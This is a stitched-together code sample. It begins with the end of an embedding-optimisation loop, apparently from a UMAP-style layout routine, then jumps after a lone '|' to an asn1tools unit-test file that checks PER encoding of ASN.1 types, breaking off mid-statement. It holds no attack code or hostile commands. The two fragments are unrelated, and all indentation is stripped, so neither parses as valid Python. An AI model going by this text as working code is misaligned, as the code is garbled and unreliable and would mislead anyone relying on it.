epochs_per_negative_sample = epochs_per_sample / negative_sample_rate
epoch_of_next_negative_sample = epochs_per_negative_sample.copy()
epoch_of_next_sample = epochs_per_sample.copy()
for n in range(n_epochs):
for i in range(epochs_per_sample.shape[0]):
if epoch_of_next_sample[i] <= n:
j = head[i]
k = tail[i]
current = head_embedding[j]
other = tail_embedding[k]
dist_output, grad_dist_output = output_metric(
current, other, *output_metric_kwds
)
w_l = weight[i]
grad_coeff = -(1 / (w_l * sigmas[j] + 1e-6))
for d in range(dim):
grad_d = clip(grad_coeff * grad_dist_output[d])
current[d] += grad_d * alpha
if move_other:
other[d] += -grad_d * alpha
epoch_of_next_sample[i] += epochs_per_sample[i]
n_neg_samples = int(
(n - epoch_of_next_negative_sample[i])
/ epochs_per_negative_sample[i]
)
for p in range(n_neg_samples):
k = tau_rand_int(rng_state) % n_vertices
other = tail_embedding[k]
dist_output, grad_dist_output = output_metric(
current, other, *output_metric_kwds
)
# w_l = 0.0 # for negative samples, the edge does not exist
w_h = np.exp(-max(dist_output - rhos[k], 1e-6) / (sigmas[k] + 1e-6))
grad_coeff = -gamma * ((0 - w_h) / ((1 - w_h) * sigmas[k] + 1e-6))
for d in range(dim):
grad_d = clip(grad_coeff * grad_dist_output[d])
current[d] += grad_d * alpha
epoch_of_next_negative_sample[i] += (
n_neg_samples * epochs_per_negative_sample[i]
)
alpha = initial_alpha * (1.0 - (float(n) / float(n_epochs)))
if verbose and n % int(n_epochs / 10) == 0:
print("\tcompleted ", n, " / ", n_epochs, "epochs")
return head_embedding
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import unittest
from .utils import Asn1ToolsBaseTest
import asn1tools
import sys
from copy import deepcopy
sys.path.append('tests/files')
sys.path.append('tests/files/3gpp')
sys.path.append('tests/files/oma')
from rrc_8_6_0 import EXPECTED as RRC_8_6_0
from s1ap_14_4_0 import EXPECTED as S1AP_14_4_0
from x691_a4 import EXPECTED as X691_A4
from ulp import EXPECTED as OMA_ULP
class Asn1ToolsPerTest(Asn1ToolsBaseTest):
maxDiff = None
def test_boolean(self):
foo = asn1tools.compile_string(
"Foo DEFINITIONS AUTOMATIC TAGS ::= "
"BEGIN "
"A ::= BOOLEAN "
"B ::= SEQUENCE { "
" a BOOLEAN, "
" b BOOLEAN "
"} "
"END",
'per')
datas = [
('A', True, b'\x80'),
('A', False, b'\x00'),
('B', {'a': False, 'b': False}, b'\x00'),
('B', {'a': True, 'b': False}, b'\x80'),
('B', {'a': False, 'b': True}, b'\x40'),
('B', {'a': True, 'b': True}, b'\xc0')
]
for type_name, decoded, encoded in datas:
self.assert_encode_decode(foo, type_name, decoded, encoded)
with self.assertRaises(asn1tools.DecodeError) as cm:
foo.decode('A', b'')
self.assertEqual(str(cm.exception),
'A: out of data (At bit offset: 0)')
def test_integer(self):
foo = asn1tools.compile_string(
"Foo DEFINITIONS AUTOMATIC TAGS ::= "
"BEGIN "
"A ::= INTEGER "
"B ::= INTEGER (5..99) "
"C ::= SEQUENCE { "
" a BOOLEAN, "
" b INTEGER, "
" c BOOLEAN, "
" d INTEGER (-10..400) "
"} "
"D ::= INTEGER (0..254) "
"E ::= INTEGER (0..255) "
"F ::= INTEGER (0..256) "
"G ::= INTEGER (0..65535) "
"H ::= INTEGER (0..65536) "
"I ::= INTEGER (0..10000000000) "
"J ::= SEQUENCE { "
" a BOOLEAN, "
" b INTEGER (0..254), "
" c INTEGER (0..255), "
" d BOOLEAN, "
" e INTEGER (0..256) "
"} "
"K ::= B (6..7) "
"L ::= SEQUENCE { "
" a K (7..7) "
"} "
"M ::= INTEGER (5..99, ..., 101..105) "
"N ::= INTEGER (0..65535) "
"O ::= INTEGER (0..65536) "
"P ::= INTEGER (0..2147483647) "
"Q ::= INTEGER (0..4294967295) "
"R ::= INTEGER (0..4294967296) "
"S ::= SEQUENCE { "
" a BOOLEAN, "
" b INTEGER (-10000..704000000000000001), "
" c BOOLEAN "
"} "
"END",
'per')
datas = [
('A', 32768, b'\x03\x00\x80\x00'),
('A', 32767, b'\x02\x7f\xff'),
('A', 256, b'\x02\x01\x00'),
('A', 255, b'\x02\x00\xff'),
('A', 128, b'\x02\x00\x80'),
('A', 127, b'\x01\x7f'),
('A', 2, b'\x01\x02'),
('A', 1, b'\x01\x01'),
('A', 0, b'\x01\x00'),
('A', -1, b'\x01\xff'),
('A', -128, b'\x01\x80'),
('A', -129, b'\x02\xff\x7f'),
('A', -256, b'\x02\xff\x00'),
('A', -32768, b'\x02\x80\x00'),
('A', -32769, b'\x03\xff\x7f\xff'),
('B', 5, b'\x00'),
('B', 6, b'\x02'),
('B', 99, b'\xbc'),
('C',
{'a': True, 'b': 43554344223, 'c': False, 'd': -9},
b'\x80\x05\x0a\x24\x0a\x8d\x1f\x00\x00\x01'),
('D', 253, b'\xfd'),
('E', 253, b'\xfd'),
('F', 253, b'\x00\xfd'),
('G', 253, b'\x00\xfd'),
('H', 253, b'\x00\xfd'),
('H', 256, b'\x40\x01\x00'),
('H', 65536, b'\x80\x01\x00\x00'),
('I', 0, b'\x00\x00'),
('I', 1, b'\x00\x01'),
('I', 10000000000, b'\x80\x02\x54\x0b\xe4\x00'),
('J',
{'a': False, 'b': 253, 'c': 253, 'd': False, 'e': 253},
b'\x7e\x80\xfd\x00\x00\xfd'),
('K', 7, b'\x80'),
('L', {'a': 7}, b''),
('M', 103, b'\x80\x01\x67'),
('N', 1, b'\x00\x01'),
('N', 255, b'\x00\xff'),
('N', 256, b'\x01\x00'),
('N', 65535, b'\xff\xff'),
('O', 1, b'\x00\x01'),
('O', 255, b'\x00\xff'),
('O', 256, b'\x40\x01\x00'),
('O', 65535, b'\x40\xff\xff'),
('O', 65536, b'\x80\x01\x00\x00'),
('P', 1, b'\x00\x01'),
('P', 255, b'\x00\xff'),
('P', 256, b'\x40\x01\x00'),
('P', 65535, b'\x40\xff\xff'),
('P', 65536, b'\x80\x01\x00\x00'),
('P', 16777215, b'\x80\xff\xff\xff'),
('P', 16777216, b'\xc0\x01\x00\x00\x00'),
('P', 100000000, b'\xc0\x05\xf5\xe1\x00'),
('Q', 4294967295, b'\xc0\xff\xff\xff\xff'),
('R', 4294967296, b'\x80\x01\x00\x00\x00\x00'),
('S',
{'a': True, 'b': 0, 'c': True},
b'\x90\x27\x10\x80')
]
for type_name, decoded, encoded in datas:
self.assert_encode_decode(foo, type_name, decoded, encoded)
def test_real(self):
foo = asn1tools.compile_string(
"Foo DEFINITIONS AUTOMATIC TAGS ::= "
"BEGIN "
"A ::= REAL "
"B ::= SEQUENCE { "
" a REAL, "
" ... "
"}"
"END",
'per')
datas = [
('A', 0.0, b'\x00'),
('A', -0.0, b'\x00'),
('A', float('inf'), b'\x01\x40'),
('A', float('-inf'), b'\x01\x41'),
('A', 1.0, b'\x03\x80\x00\x01'),
('B', {'a': 1.0}, b'\x00\x03\x80\x00\x01'),
('B',
{'a': 1000000000},
b'\x00\x05\x80\x09\x1d\xcd\x65')
]
for type_name, decoded, encoded in datas:
self.assert_encode_decode(foo, type_name, decoded, encoded)
def test_bit_string(self):
foo = asn1tools.compile_string(
"Foo DEFINITIONS AUTOMATIC TAGS ::= "
"BEGIN "
"A ::= BIT STRING "
"B ::= BIT STRING (SIZE (9)) "
"C ::= BIT STRING (SIZE (5..7)) "
"D ::= SEQUENCE { "
" a BOOLEAN, "
" b BIT STRING "
"} "
"E ::= SEQUENCE { "
" a BOOLEAN, "
" b BIT STRING (SIZE(1)), "
" c BIT STRING (SIZE(16)) "
"} "
"F ::= BIT STRING { "
" a (0), "
" b (1), "
" c (2) "
"} "
"G ::= SEQUENCE { "
" a BIT STRING, "
" b BOOLEAN "
"} "
"H ::= SEQUENCE SIZE (0..2) OF BIT STRING (SIZE(1..255)) "
"I ::= SEQUENCE SIZE (0..2) OF BIT STRING (SIZE(1..256)) "
"J ::= SEQUENCE SIZE (0..2) OF BIT STRING (SIZE(2..256)) "
"K ::= SEQUENCE SIZE (0..2) OF BIT STRING (SIZE(2..257)) "
"L ::= BIT STRING (SIZE (1..160, ...)) "
"M ::= SEQUENCE { "
" a BOOLEAN, "
" b BIT STRING (SIZE (1..160, ...)) "
"} "
"N ::= BIT STRING (SIZE(0..65535)) "
"O ::= BIT STRING (SIZE(0..65536)) "
"END",
'per')
datas = [
('A', (b'\x40', 4), b'\x04\x40'),
('A',
(299 * b'\x55' + b'\x54', 2399),
b'\x89\x5f' + 299 * b'\x55' + b'\x54'),
('A',
(2048 * b'\x55', 16384),
b'\xc1' + 2048 * b'\x55' + b'\x00'),
('B', (b'\x12\x80', 9), b'\x12\x80'),
('C', (b'\x34', 6), b'\x40\x34'),
('D', {'a': True, 'b': (b'\x40', 4)}, b'\x80\x04\x40'),
('E',
{'a': True, 'b': (b'\x80', 1), 'c': (b'\x7f\x01', 16)},
b'\xdf\xc0\x40'),
('F', (b'\x80', 1), b'\x01\x80'),
('F', (b'\xe0', 3), b'\x03\xe0'),
('F', (b'\x01', 8), b'\x08\x01'),
('G', {'a': (b'\x80', 2), 'b': True}, b'\x02\xa0'),
('G', {'a': (b'', 0), 'b': True}, b'\x00\x80'),
('H', [(b'\x40', 2)], b'\x40\x40\x40'),
('I', [(b'\x40', 2)], b'\x40\x01\x40'),
('J', [(b'\x40', 2)], b'\x40\x00\x40'),
('K', [(b'\x40', 2)], b'\x40\x00\x40'),
('L', (b'\x80', 1), b'\x00\x00\x80'),
('M', {'a': True, 'b': (b'\xe0', 3)}, b'\x80\x80\xe0'),
('N', (b'', 0), b'\x00\x00'),
('O', (b'', 0), b'\x00')
]
for type_name, decoded, encoded in datas:
self.assert_encode_decode(foo, type_name, decoded, encoded)
# Trailing zero bits should be stripped when encoding named
# bit list. Default value is not encoded, but part of
# decoded. Also ignore dangling bits.
datas = [
('F', (b'\x80', 2), b'\x01\x80', (b'\x80', 1)),
('F', (b'\x40', 3), b'\x02\x40', (b'\x40', 2)),
('F', (b'\x00', 3), b'\x00', (b'', 0)),
('F', (b'\x00', 8), b'\x00', (b'', 0))
]
for type_name, decoded_1, encoded, decoded_2 in datas:
self.assertEqual(foo.encode(type_name, decoded_1), encoded)
self.assertEqual(foo.decode(type_name, encoded), decoded_2)
def test_octet_string(self):
foo = asn1tools.compile_string(
"Foo DEFINITIONS AUTOMATIC TAGS ::= "
"BEGIN "
"A ::= OCTET STRING "
"B ::= OCTET STRING (SIZE (2)) "
"C ::= OCTET STRING (SIZE (3)) "
"D ::= OCTET STRING (SIZE (3..7)) "
"E ::= SEQUENCE { "
" a BOOLEAN, "
" b OCTET STRING "
"} "
"F ::= SEQUENCE { "
" a BOOLEAN, "
" b OCTET STRING (SIZE(1)), "
" c OCTET STRING (SIZE(2)) "
"} "
"G ::= SEQUENCE { "
" a BOOLEAN, "
" b OCTET STRING (SIZE(3)) "
"} "
"H ::= OCTET STRING (SIZE (65535)) "
"I ::= OCTET STRING (SIZE (65536)) "
"J ::= OCTET STRING (SIZE (1..MAX)) "
"K ::= OCTET STRING (SIZE (MIN..5)) "
"L ::= OCTET STRING (SIZE (1..2, ...)) "
"M ::= SEQUENCE SIZE (0..2) OF OCTET STRING (SIZE(1..255)) "
"N ::= SEQUENCE SIZE (0..2) OF OCTET STRING (SIZE(1..256)) "
"O ::= SEQUENCE SIZE (0..2) OF OCTET STRING (SIZE(2..256)) "
"P ::= SEQUENCE SIZE (0..2) OF OCTET STRING (SIZE(2..257)) "
"END",
'per')
datas = [
('A', b'\x00', b'\x01\x00'),
('A', 500 * b'\x00', b'\x81\xf4' + 500 * b'\x00'),
('B', b'\xab\xcd', b'\xab\xcd'),
('C', b'\xab\xcd\xef', b'\xab\xcd\xef'),
('D', b'\x89\xab\xcd\xef', b'\x20\x89\xab\xcd\xef'),
('E', {'a': True, 'b': b'\x00'}, b'\x80\x01\x00'),
('E', {'a': True, 'b': b'\x00\x01\x02'}, b'\x80\x03\x00\x01\x02'),
('F',
{'a': True, 'b': b'\x12', 'c': b'\x34\x56'},
b'\x89\x1a\x2b\x00'),
('G', {'a': True, 'b': b'\x00\x01\x02'}, b'\x80\x00\x01\x02'),
('H', 32767 * b'\x01\x02' + b'\x01', 32767 * b'\x01\x02' + b'\x01'),
('I',
32768 * b'\x01\x02',
b'\xc4' + 32768 * b'\x01\x02'
+ b'\x00'),
('A',
4095 * b'\x00\x01\x02\x03' + b'\x00\x01\x02',
b'\xbf\xff' + 4095 * b'\x00\x01\x02\x03' + b'\x00\x01\x02'),
('A',
4095 * b'\x00\x01\x02\x03' + b'\x00\x01\x02\x03',
b'\xc1' + 4095 * b'\x00\x01\x02\x03' + b'\x00\x01\x02\x03'
+ b'\x00'),
('A',
4095 * b'\x00\x01\x02\x03' + b'\x00\x01\x02\x03\x00',
b'\xc1' + 4095 * b'\x00\x01\x02\x03' + b'\x00\x01\x02\x03'
+ b'\x01' + b'\x00'),
('J', b'\x12', b'\x01\x12'),
('K', b'', b'\x00'),
('L', b'\x12\x34', b'\x40\x12\x34'),
('L', b'\x12\x34\x56', b'\x80\x03\x12\x34\x56'),
('M', [b'\x12\x34'], b'\x40\x40\x12\x34'),
('M', [b'\x12\x34\x56\x78'], b'\x40\xc0\x12\x34\x56\x78'),
('N', [b'\x12\x34'], b'\x40\x01\x12\x34'),
('N', [b'\x12\x34\x56\x78'], b'\x40\x03\x12\x34\x56\x78'),
('O', [b'\x12\x34\x56'], b'\x40\x40\x12\x34\x56'),
('O', [b'\x12\x34\x56\x78'], b'\x40\x80\x12\x34\x56\x78'),
('P', [b'\x12\x34\x56'], b'\x40\x01\x12\x34\x56'),
('P', [b'\x12\x34\x56\x78'], b'\x40\x02\x12\x34\x56\x78')
]
for type_name, decoded, encoded in datas:
self.assert_encode_decode(foo, type_name, decoded, encoded)
def test_object_identifier(self):
foo = asn1tools.compile_string(
"Foo DEFINITIONS AUTOMATIC TAGS ::= "
"BEGIN "
"A ::= OBJECT IDENTIFIER "
"B ::= SEQUENCE { "
" a BOOLEAN, "
" b OBJECT IDENTIFIER "
"} "
"END",
'per')
datas = [
('A', '1.2', b'\x01\x2a'),
('A', '1.2.3321', b'\x03\x2a\x99\x79'),
('B', {'a': True, 'b': '1.2'}, b'\x80\x01\x2a')
]
for type_name, decoded, encoded in datas:
self.assert_encode_decode(foo, type_name, decoded, encoded)
def test_external(self):
foo = asn1tools.compile_string(
"Foo DEFINITIONS AUTOMATIC TAGS ::= "
"BEGIN "
"A ::= EXTERNAL "
"END",
'per')
datas = [
('A', {'encoding': ('octet-aligned', b'\x12')}, b'\x08\x01\x12')
]
for type_name, decoded, encoded in datas:
self.assert_encode_decode(foo, type_name, decoded, encoded)
def test_enumerated(self):
foo = asn1tools.compile_string(
"Foo DEFINITIONS AUTOMATIC TAGS ::= "
"BEGIN "
"A ::= ENUMERATED { one(1) } "
"B ::= ENUMERATED { zero(0), one(1), ... } "
"C ::= ENUMERATED { one(1), four(4), two(2), ..., six(6), nine(9) } "
"D ::= ENUMERATED { a, ..., "
"aa, ab, ac, ad, ae, af, ag, ah, ai, aj, ak, al, am, an, ao, ap, "
"aq, ar, as, at, au, av, aw, ax, ay, az, ba, bb, bc, bd, be, bf, "
"bg, bh, bi, bj, bk, bl, bm, bn, bo, bp, bq, br, bs, bt, bu, bv, "
"bw, bx, by, bz, ca, cb, cc, cd, ce, cf, cg, ch, ci, cj, ck, cl, "
"cm, cn, co, cp, cq, cr, cs, ct, cu, cv, cw, cx, cy, cz, da, db, "
"dc, dd, de, df, dg, dh, di, dj, dk, dl, dm, dn, do, dp, dq, dr, "
"ds, dt, du, dv, dw, dx, dy, dz, ea, eb, ec, ed, ee, ef, eg, eh, "
"ei, ej, ek, el, em, en, eo, ep, eq, er, es, et, eu, ev, ew, ex, "
"ey, ez, fa, fb, fc, fd, fe, ff, fg, fh, fi, fj, fk, fl, fm, fn, "
"fo, fp, fq, fr, fs, ft, fu, fv, fw, fx, fy, fz, ga, gb, gc, gd, "
"ge, gf, gg, gh, gi, gj, gk, gl, gm, gn, go, gp, gq, gr, gs, gt, "
"gu, gv, gw, gx, gy, gz, ha, hb, hc, hd, he, hf, hg, hh, hi, hj, "
"hk, hl, hm, hn, ho, hp, hq, hr, hs, ht, hu, hv, hw, hx, hy, hz, "
"ia, ib, ic, id, ie, if, ig, ih, ii, ij, ik, il, im, in, io, ip, "
"iq, ir, is, it, iu, iv, iw, ix, iy, iz, ja, jb, jc, jd, je, jf, "
"jg, jh, ji, jj, jk, jl, jm, jn, jo, jp, jq, jr, js, jt, ju, jv, "
"jw, jx, jy, jz } "
"E ::= SEQUENCE { "
" a BOOLEAN, "
" b B "
"} "
"F ::= SEQUENCE {"
" a ENUMERATED { zero(0), one(1) } DEFAULT one"
"}"
"END",
'per')
datas = [
('A', 'one', b''),
('B', 'zero', b'\x00'),
('B', 'one', b'\x40'),
('C', 'one', b'\x00'),
('C', 'two', b'\x20'),
('C', 'four', b'\x40'),
('C', 'six', b'\x80'),
('C', 'nine', b'\x81'),
('D', 'aa', b'\x80'),
('D', 'cl', b'\xbf'),
('D', 'cm', b'\xc0\x50\x00'),
('D', 'jv', b'\xc0\x7f\xc0'),
('D', 'jw', b'\xc0\x80\x40\x00'),
('D', 'jz', b'\xc0\x80\x40\xc0'),
('E', {'a': True, 'b': 'zero'}, b'\x80'),
('E', {'a': True, 'b': 'one'}, b'\xa0'),
('F', {'a': 'zero'}, b'\x80'),
('F', {'a': 'one'}, b'\x00') ]
for type_name, decoded, encoded in datas:
self.assert_encode_decode(foo, type_name, decoded, encoded)
# Default value is not encoded, but part of decoded.
datas = [
('F', {}, b'\x00', {'a': 'one'})
]
for type_name, decoded_1, encoded_1, decoded_2 in datas:
self.assertEqual(foo.encode(type_name, decoded_1), encoded_1)
self.assertEqual(foo.decode(type_name, encoded_1), decoded_2)
# Bad root index.
with self.assertRaises(asn1tools.DecodeError) as cm:
foo.decode('C', b'\x70')
self.assertEqual(str(cm.exception),
"C: Expected enumeration index 0, 1 or 2, but got 3.")
# Unknown additions index.
self.assertEqual(foo.decode('C', b'\x8f'), None)
def test_sequence(self):
foo = asn1tools.compile_string(
"Foo DEFINITIONS AUTOMATIC TAGS ::= "
"BEGIN "
"A ::= SEQUENCE {} "
"B ::= SEQUENCE { "
" a INTEGER DEFAULT 0 "
"} "
"C ::= SEQUENCE { "
" a BOOLEAN, "
" ... "
"} "
"D ::= SEQUENCE { "
" a BOOLEAN, "
" ..., "
" [[ "
" b BOOLEAN "
" ]] "
"} "
"E ::= SEQUENCE { "
" a BOOLEAN, "
" ..., "
" [[ "
" b BOOLEAN "
" ]], "
" ... "
"} "
"F ::= SEQUENCE { "
" a BOOLEAN, "
" ..., "
" [[ "
" b BOOLEAN "
" ]], "
" ..., "
" c BOOLEAN "
"} "
"G ::= SEQUENCE { "
" a BOOLEAN, "
" ..., "
" [[ "
" b BOOLEAN "
" ]], "
" [[ "
" c BOOLEAN "
" ]], "
" ..., "
" d BOOLEAN "
"} "
"H ::= SEQUENCE { "
" a BOOLEAN, "
" ..., "
" ... "
"} "
"I ::= SEQUENCE { "
" a BOOLEAN, "
" ..., "
" b BOOLEAN "
"} "
"J ::= SEQUENCE { "
" a BOOLEAN, "
" ..., "
" b BOOLEAN OPTIONAL "
"} "
"K ::= SEQUENCE { "
" a BOOLEAN, "
" ..., "
" b BOOLEAN, "
" c BOOLEAN "
"} "
"L ::= SEQUENCE { "
" a BOOLEAN, "
" ..., "
" [[ "
" b BOOLEAN, "
" c BOOLEAN "
" ]] "
"} "
"M ::= SEQUENCE { "
" a BOOLEAN, "
" ..., "
" [[ "
" b SEQUENCE { "
" a INTEGER"
" } OPTIONAL, "
" c BOOLEAN "
" ]] "
"} "
"N ::= SEQUENCE { "
" a BOOLEAN DEFAULT TRUE "
"} "
"O ::= SEQUENCE { "
" ..., "
" a BOOLEAN DEFAULT TRUE "
"} "
"P ::= SEQUENCE { "
" ..., "
" [[ "
" a BOOLEAN, "
" b BOOLEAN DEFAULT TRUE "
" ]] "
"} "
"Q ::= SEQUENCE { "
" a C, "
" b INTEGER "
"} "
"R ::= SEQUENCE { "
" a D, "
" b INTEGER "
"} "
"S ::= SEQUENCE { "
" a BOOLEAN, "
" ..., "
" b SEQUENCE { "
" a BOOLEAN, "
" b BOOLEAN OPTIONAL, "
" ... "
" } "
"} "
"T ::= SEQUENCE { "
" a SEQUENCE OF T OPTIONAL "
"} "
"U ::= SEQUENCE { "
" ..., "
" a SEQUENCE { "
" a INTEGER "
" } "
"} "
"V ::= SEQUENCE { "
" ..., "
" a OCTET STRING, "
" b INTEGER "
"} "
"W ::= SEQUENCE { "
" a BOOLEAN, "
" ..., "
" b NULL "
"} "
"END",
'per')
datas = [
('A', {}, b''),
('O', {}, b'\x00'),
('B', {'a': 0}, b'\x00'),
('B', {'a': 1}, b'\x80\x01\x01'),
('C', {'a': True}, b'\x40'),
('D', {'a': True}, b'\x40'),
('E', {'a': True}, b'\x40'),
('H', {'a': True}, b'\x40'),
('I', {'a': True}, b'\x40'),
('J', {'a': True}, b'\x40'),
('K', {'a': True}, b'\x40'),
('L', {'a': True}, b'\x40'),
('M', {'a': True}, b'\x40'),
('N', {'a': True}, b'\x00'),
('N', {'a': False}, b'\x80'),
('P', {}, b'\x00'),
('O', {'a': True}, b'\x80\x80\x01\x80'),
('O', {'a': False}, b'\x80\x80\x01\x00'),
('P', {'a': True, 'b': True}, b'\x80\x80\x01\x40'),
('P', {'a': True, 'b': False}, b'\x80\x80\x01\xc0'),
('D', {'a': True, 'b': True}, b'\xc0\x40\x01\x80'),
('E', {'a': True, 'b': True}, b'\xc0\x40\x01\x80'),
('F', {'a': True, 'c': True}, b'\x60'),
('G', {'a': True, 'd': True}, b'\x60'),
('I', {'a': True, 'b': True}, b'\xc0\x40\x01\x80'),
('J', {'a': True, 'b': True}, b'\xc0\x40\x01\x80'),
('K', {'a': True, 'b': True}, b'\xc0\xc0\x01\x80'),
('F', {'a': True, 'b': True, 'c': True}, b'\xe0\x20\x01\x80'),
('K', {'a': True, 'b': True, 'c': True}, b'\xc0\xe0\x01\x80\x01\x80'),
('L', {'a': True, 'b': True, 'c': True}, b'\xc0\x40\x01\xc0'),
('G', {'a': True, 'b': True, 'd': True}, b'\xe0\x60\x01\x80'),
('G',
{'a': True, 'b': True, 'c': True, 'd': True},
b'\xe0\x70\x01\x80\x01\x80'),
('M',
{'a': True, 'b': {'a': 5}, 'c': True},
b'\xc0\x40\x04\x80\x01\x05\x80'),
('Q', {'a': {'a': True}, 'b': 100}, b'\x40\x01\x64'),
('R',
{'a': {'a': True, 'b': True}, 'b': 100},
b'\xc0\x40\x01\x80\x01\x64'),
('S',
{'a': True, 'b': {'a': True, 'b': True}},
b'\xc0\x40\x01\x70'),
('T', {'a': [{}]}, b'\x80\x01\x00'),
('T', {'a': [{'a': []}]}, b'\x80\x01\x80\x00'),
('V',
{'a': 5000 * b'\x00', 'b': 1000},
b'\x81\xc0\x93\x8a\x93\x88' + 5000 * b'\x00' + b'\x03\x02\x03\xe8'),
('W', {'a': True, 'b': None},
b'\xc0\x40\x00')
]
for type_name, decoded, encoded in datas:
self.assert_encode_decode(foo, type_name, decoded, encoded)
# Non-symmetrical encoding and decoding because default values
# are not encoded, but part of the decoded (given that the
# root and addition is present).
self.assertEqual(foo.encode('N', {}), b'\x00')
self.assertEqual(foo.decode('N', b'\x00'), {'a': True})
self.assertEqual(foo.encode('P', {'a': True}), b'\x80\x80\x01\x40')
self.assertEqual(foo.decode('P', b'\x80\x80\x01\x40'),
{'a': True, 'b': True})
# Decode D as C. Extension addition "a.b" should be skipped.
self.assertEqual(foo.decode('C', b'\xc0\x40\x01\x80'), {'a': True})
# Decode R as Q. Extension addition "a.b" should be skipped.
self.assertEqual(foo.decode('Q', b'\xc0\x40\x01\x80\x01\x64'),
{'a': {'a': True}, 'b': 100})
# Decode error of present addition member (out of data).
with self.assertRaises(asn1tools.DecodeError) as cm:
foo.decode('U', b'\x80\x80\x03\x02\x05')
self.assertEqual(str(cm.exception),
'U.a.a: out of data (At bit offset: 32)')
# Missing root member.
with self.assertRaises(asn1tools.EncodeError) as cm:
foo.encode('K', {'b': True})
self.assertEqual(str(cm.exception),
"K: Sequence member 'a' not found in {'b': True}.")
def test_sequence_of(self):
foo = asn1tools.compile_string(
"Foo DEFINITIONS AUTOMATIC TAGS ::= "
"BEGIN "
"A ::= SEQUENCE OF INTEGER "
"B ::= SEQUENCE SIZE (2) OF INTEGER "
"C ::= SEQUENCE SIZE (1..5) OF INTEGER "
"D ::= SEQUENCE SIZE (1..2, ...) OF INTEGER "
"E ::= SEQUENCE { "
" a BOOLEAN, "
" b SEQUENCE OF INTEGER "
"} "
"F ::= SEQUENCE { "
" a BOOLEAN, "
" b SEQUENCE SIZE(1) OF INTEGER "
"} "
"G ::= SEQUENCE SIZE (1..2, ..., 6..7) OF INTEGER "
"H ::= SEQUENCE SIZE (1..MAX) OF INTEGER "
"I ::= SEQUENCE SIZE (1..10000) OF OCTET STRING "
"END",
'per')
datas = [
('A', [], b'\x00'),
('A', [1], b'\x01\x01\x01'),
('A', [1, 2], b'\x02\x01\x01\x01\x02'),
('A', 1000 * [1, 2], b'\x87\xd0' + 1000 * b'\x01\x01\x01\x02'),
('A', 16384 * [1], b'\xc1' + 16384 * b'\x01\x01' + b'\x00'),
('A',
65535 * [1],
b'\xc3' + 49152 * b'\x01\x01' + b'\xbf\xff' + 16383 * b'\x01\x01'),
('A',
100000 * [1],
b'\xc4' + 65536 * b'\x01\x01'
+ b'\xc2' + 32768 * b'\x01\x01'
+ b'\x86\xa0' + 1696 * b'\x01\x01'),
('B', [1, 2], b'\x01\x01\x01\x02'),
('B', [4663, 222322233], b'\x02\x12\x37\x04\x0d\x40\x5e\x39'),
('C', [1], b'\x00\x01\x01'),
('C', [1, 2], b'\x20\x01\x01\x01\x02'),
('D', [2, 1], b'\x40\x01\x02\x01\x01'),
('E', {'a': False, 'b': []}, b'\x00\x00'),
('E', {'a': False, 'b': [1]}, b'\x00\x01\x01\x01'),
('F', {'a': False, 'b': [1]}, b'\x00\x01\x01'),
('G',
6 * [1],
b'\x80\x06\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01'),
('H', [1], b'\x01\x01\x01'),
('I', 300 * [b'\x56'], b'\x01\x2b' + 300 * b'\x01\x56')
]
for type_name, decoded, encoded in datas:
self.assert_encode_decode(foo, type_name, decoded, encoded)
def test_choice(self):
foo = asn1tools.compile_string(
"Foo DEFINITIONS AUTOMATIC TAGS ::= "
"BEGIN "
"A ::= CHOICE { "
" a BOOLEAN "
"} "
"B ::= CHOICE { "
" a BOOLEAN, "
" ... "
"} "
"C ::= CHOICE { "
" a BOOLEAN, "
" b INTEGER, "
" ..., "
" [[ "
" c BOOLEAN "
" ]] "
"} "
"D ::= CHOICE { "
" a BOOLEAN, "
" ..., "
" [[ "
" b BOOLEAN "
" ]], "
" ... "
"} "
"E ::= CHOICE { "
" a BOOLEAN, "
" ..., "
" [[ "
" b BOOLEAN "
" ]], "
" [[ "
" c BOOLEAN "
" ]], "
" ... "
"} "
"F ::= CHOICE { "
" a BOOLEAN, "
" ..., "
" ... "
"} "
"G ::= CHOICE { "
" a BOOLEAN, "
" ..., "
" b BOOLEAN "
"} "
"H ::= CHOICE { "
" a BOOLEAN, "
" ..., "
" b BOOLEAN, "
" c BOOLEAN "
"} "
"I ::= CHOICE { "
" a BOOLEAN, "
" ..., "
" [[ "
" b BOOLEAN, "
" c BOOLEAN "
" ]] "
"} "
"J ::= CHOICE { "
" a BOOLEAN, "
" ..., "
" [[ "
" b CHOICE { "
" a INTEGER"
" }, "
" c BOOLEAN "
" ]] "
"} "
"K ::= CHOICE { "
" a BOOLEAN, "
" b BOOLEAN, "
" c BOOLEAN, "
" ..., "
" d BOOLEAN, "
" e BOOLEAN, "
" f BOOLEAN, "
" g BOOLEAN, "
" h BOOLEAN "
"} "
"L ::= CHOICE { "
" a BOOLEAN, "
" b BOOLEAN, "
" c BOOLEAN, "
" ..., "
" d BOOLEAN, "
" e BOOLEAN, "
" f BOOLEAN, "
" g BOOLEAN, "
" h BOOLEAN, "
" i BOOLEAN "
"} "
"END",
'per')
datas = [
('A', ('a', True), b'\x80'),
('B', ('a', True), b'\x40'),
('C', ('a', True), b'\x20'),
('C', ('b', 1), b'\x40\x01\x01'),
('C', ('c', True), b'\x80\x01\x80'),
('D', ('a', True), b'\x40'),
('D', ('b', True), b'\x80\x01\x80'),
('E', ('a', True), b'\x40'),
('E', ('b', True), b'\x80\x01\x80'),
('E', ('c', True), b'\x81\x01\x80'),
('F', ('a', True), b'\x40'),
('G', ('a', True), b'\x40'),
('G', ('b', True), b'\x80\x01\x80'),
('H', ('a', True), b'\x40'),
('H', ('b', True), b'\x80\x01\x80'),
('H', ('c', True), b'\x81\x01\x80'),
('I', ('a', True), b'\x40'),
('I', ('b', True), b'\x80\x01\x80'),
('I', ('c', True), b'\x81\x01\x80'),
('J', ('a', True), b'\x40'),
('J', ('b', ('a', 1)), b'\x80\x02\x01\x01'),
('J', ('c', True), b'\x81\x01\x80'),
('L', ('i', True), b'\x85\x01\x80')
]
for type_name, decoded, encoded in datas:
self.assert_encode_decode(foo, type_name, decoded, encoded)
# Bad root index.
with self.assertRaises(asn1tools.DecodeError) as cm:
foo.decode('K', b'\x70')
self.assertEqual(str(cm.exception),
"K: Expected choice index 0, 1 or 2, but got 3.")
# Bad additions index becomes None.
decoded = foo.decode('K', b'\x85\x01\x80')
self.assertEqual(decoded, (None, None))
# Bad value.
with self.assertRaises(asn1tools.EncodeError) as cm:
foo.encode('K', ('i', True), check_types=False)
self.assertEqual(
str(cm.exception),
